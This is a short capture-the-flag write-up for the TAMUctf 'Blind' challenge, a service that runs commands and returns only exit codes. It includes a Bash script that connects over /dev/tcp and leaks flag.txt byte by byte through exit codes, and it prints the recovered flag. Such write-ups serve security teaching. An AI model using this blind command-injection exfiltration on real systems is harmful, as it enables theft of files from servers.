TAMUctf_Blind

Write up of the challenge Blind from TAMUctf

Recon

I connected to nc challenges.tamuctf.com 3424

I got back the prompt Execute:

When Typing a command only a number is returned, no other feedback is given. I figured out that this must be the Linux/ UNIX exit codes.

After playing around for a bit I found out that typing cat flag.txt returns 0, meaning the operation was successful and a flag.txt file exists in the current directory.

Solution

My plan was to return the flag over these error codes, since you’re able to send numbers up to 255 with the exit command.

I wrote a short Bash script to extract the flag as decimal numbers:

#!/usr/bin/env bash

exec 3<>/dev/tcp/challenges.tamuctf.com/3424;                             #Setting up a Socket

for i in {1..30}
do
        #Convert each Byte and send exit with error code
        echo "exit \$(printf ’%d’ \"’\$(cat flag.txt|cut -c$i-$i)\")" >&3 
done
cat <&3

It sends this command exit \$(printf ’%d’ \"’\$(cat flag.txt|cut -c$i-$i)\") for the server to get executed. I get the flag with cat flag.txt pipe that to cut -c$i-$i because I can only extract one letter at a time. The letter gets converted to its decimal equivalent with printf ’%d’ "’[Output from cat and cut]’.

Now all that is left is to convert the flag back to ASCII and you get: gigem{r3v3r53_5h3ll5}

This hints at the intended solution of using a reverse shell to access the flag.